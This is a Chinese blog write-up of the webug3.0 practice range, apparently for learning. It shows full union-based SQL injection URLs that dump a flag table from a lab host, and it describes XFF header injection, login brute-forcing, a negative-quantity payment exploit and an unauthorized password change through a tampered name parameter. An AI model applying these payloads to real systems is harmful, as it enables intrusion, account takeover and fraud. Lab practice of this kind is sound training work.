zoukankan      html  css  js  c++  java
  • webug3.0靶场渗透基础Day_1

    第一关:

    最简单的get注入

     

    单引号报错

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' order by 5 --+     报错

    说明查询了四列,接着

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,4 --+

     

    发现1234都有回显,后面就很简单了

    查询数据库名

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,database(),4 --+

    爆出数据库名为pentesterlab

    查表

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,table_name,4 from information_schema.tables where table_schema = 'pentesterlab'--+

     

    发现flag表

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,column_name,4 from information_schema.columns where table_name = 'flag'--+

    接着查询数据

    http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,flag,4 from flag--+

    md5解密后为

     

    第二关:

    打开是一个小狗图片,扩展名改成zip里面有个123.txt

    第三关:

    渗透网站的时候目录也很重要

    扫描目录发现有个test的文件夹

    把test加密得到flag

    第四关:

    当遇到五位验证码的时候可以爆破

    进来是一个登录框,没看到验证码

    经过字典爆破账号密码为admin admin123

    然后就做不来了

    第五关:

    头部的一个注入

    XFF头注入,不做多解释了,后面都一样

    第六关:

    支付问题:用最少的钱去购买到一本书!

    点开是个登陆界面,试了半天发现,密码在第七关的标题

     进来以后

    前面数量为-2本,后面买1本

    不花钱直接白嫖

    ps:没有flag这种东西我好难受

    第七关:

    越权

    登陆上我们的tom用户,发现有个更改密码的超链接

    点开试试

    发现直接传递了name这个参数

    把他改成admin试试

     

    旧密码随便输入,再修改你的新密码,直接就可以修改成功。

    后面的题目等有时间再写,溜了。

  • 相关阅读:
    福大软工1816 · 第一次作业
    Python学习
    实验12——指针的基础应用2
    实验11——指针的基础应用
    实验十——一维数组的定义及引用
    实验九——基本数据类型存储及应用总结
    实验八——函数定义及调用总结
    实验七——函数定义及调用总结
    实验六——循环结构程序练习总结
    实验五——循环结构学习总结
  • 原文地址:https://www.cnblogs.com/qxxaq/p/11633769.html
Copyright © 2011-2022 走看看